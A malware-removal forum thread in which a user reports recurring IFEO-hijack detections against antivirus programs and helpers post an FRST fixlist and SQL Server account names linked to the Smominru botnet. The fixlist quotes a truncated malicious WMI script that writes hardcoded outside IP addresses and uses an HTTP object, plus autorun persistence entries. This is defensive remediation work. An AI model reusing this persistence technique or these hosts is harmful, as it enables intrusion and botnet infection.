Jump to content

Reacquiring Virus


Go to solution Solved by AdvancedSetup,

Recommended Posts

Hello,

I have been battling a virus for weeks. MWB finds and fixes the problem but it just keeps coming back. 

I am working with someone from bleeping computers so I don't want to bring to many chefs to the table but I would like to know if you have any helpful advice.

I use MWB Nebula...

Below is the a report on what keeps coming back. It's always the same 92 infections...

 

Any assistance would be deeply appreciated...

Thank you!

 

Hello Mark Lonabaugh,

Based on your preferences, you are being notified that a new event has occurred for the following account:

Data Capture Solutions

  • Endpoint Name: Nav.Datacapture.prv
  • Domain/Workgroup: Datacapture.prv
  • IP: 192.168.0.17
  • Scan Date and Time: 08/05/2021 - 03:56:51 PM
  • Scan Type: ThreatScan
  • Detections Cleaned: 92
  • Severity: warning
  • Group: Default Group
  • Policy: Default Policy

Displaying 92 of 92 detections below - additional details can be viewed via the Scan Report.

Name

Type

Category

Status

Path

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe

RiskWare.IFEOHijack

Reg, Value

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe|DEBUGGER

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\kvxp.kxp

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMonXP.kxp

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\kvxp.kxp

RiskWare.IFEOHijack

Reg, Key

Malware

Quarantined

HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMonXP.kxp

 

Link to post
Share on other sites

  • Staff

Hello mlonabaugh,

Thank you for reaching out to us regarding this issue.  I'm from the Nebula team that handles Malware Remediation.  I was able to review your FRST logs from the BC forum and have made you a Fixlist that should resolve the issue.  Please follow the steps below to to use the attached Fixlist.txt:

1. Download the file Fixlist.txt that is attached to this post and save it to the same folder as FRST64.exe
2. Open FRST64.exe and click Fix
3. You should get a pop-up stating the Fix completed and that a Fixlog.txt was generated. Click OK.

Please attach the Fixlog.txt to your reply, and let me know if you're still seeing the scan results after rebooting the server.

Thanks again,

Fixlist.txt

  • Like 1
Link to post
Share on other sites

  • Staff

Hello mlonabaugh,

No problem.  Copy the quoted text below into Notepad and save it as Fixlist.txt.

 

HKLM\...\Command Processor: C:\ProgramData\SQLAGENTVHC.exe <==== ATTENTION
cmd: certutil -hashfile "C:\ProgramData\SQLAGENTVHC.exe" sha256
C:\ProgramData\SQLAGENTVHC.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicyScripts: Restriction <==== ATTENTION
Policies: C:\Users\aadmincopy\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\backup_svc\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\mlonabaugh\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport1\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport2\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport3\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport4\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\printing\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\SPAdmin\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\SPService\NTUSER.pol: Restriction <==== ATTENTION
Powershell: Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Powershell: Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"bleepyoumm_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"bleepyoumm_filter\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->bleepyoumm_filter::[Query => select * from __timerevent where timerid="bleepyoumm_itimer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->bleepyoumm_consumer::[ScriptText => var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close(); (the data entry has 2402 more characters).] <==== ATTENTION 

Thanks again,

Edited by AdvancedSetup
Changed Quote for Code tag
  • Like 1
Link to post
Share on other sites

Thank you. I will need to wait until the end of day to do this, but I will get back to you asap.

I also discovered that there were 7 sql jobs set to fire off at different times of the day. 

I am hoping that killing those jobs will do the trick...

 

Thanks again!!!!!

  • Like 1
Link to post
Share on other sites

6 hours ago, AdvancedSetup said:

If there is an actual stored procedure or job calling it you might want to search out the stored procedures and see what they're doing.

https://jesspomfret.com/searching-stored-procedures/

 

Thank you for the suggestion...

I ran multiple queries and they all returned "(0 row(s) affected)" 

 

Thank you!!!

Link to post
Share on other sites

Hello mlonabaugh,

It looks like the Smominru Botnet

Could you please check if you have the following users in SQL Server: 

'users';
'usera';
'ps';
'fox';
'wwo';
'wq';
'so';
'gaibian';
'xxa';
'win7';
'vice';
'sz';
'ss';
'se';
'gd';
'syn';
'sasa';
'count';
'Myar';
'chica';
'masqer';
'system';
'Rolename';
'kisadminnew1';
'nanshou1433';
'nanshou';
'shitou';
'nanshou';

If so, disable them, but don't delete them yet.

Please choose where you want to receive help: here or at  bleepingcomputer?

Important: Please do not delete anything by yourself. 

Edited by SQx
  • Like 1
Link to post
Share on other sites

Good morning,

This forum is a bit easier to use, so if you don't mind let's stay here. I was not aware you had a presence in both places...

The only thing I did last night was disable the network connection to prevent any hacking while I slept, I will run your query asap...

Thank you!

Link to post
Share on other sites

Just to be clear... Is that a query you posted? or just a list of names you want me to visually inspect? 

If you just want a visual inspection, the answer is no to all. I have 7 unknown users that were created right about when this all started. I have disabled all of them. (Not deleted)

They are: dcs, help, Mssql, Mssqla, sql, sqlup, web, websa...

Link to post
Share on other sites

2 hours ago, mlonabaugh said:

Just to be clear... Is that a query you posted? or just a list of names you want me to visually inspect? 

Hello mlonabaugh,

Yes I posted just for visual inspect. Thanks.

Link to post
Share on other sites

3 hours ago, mlonabaugh said:

Good morning,

This forum is a bit easier to use, so if you don't mind let's stay here. I was not aware you had a presence in both places...

Hello mlonabaugh,

Sorry, I cannot help you here. I just want you to know that getting help at two places at once is just confusing.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.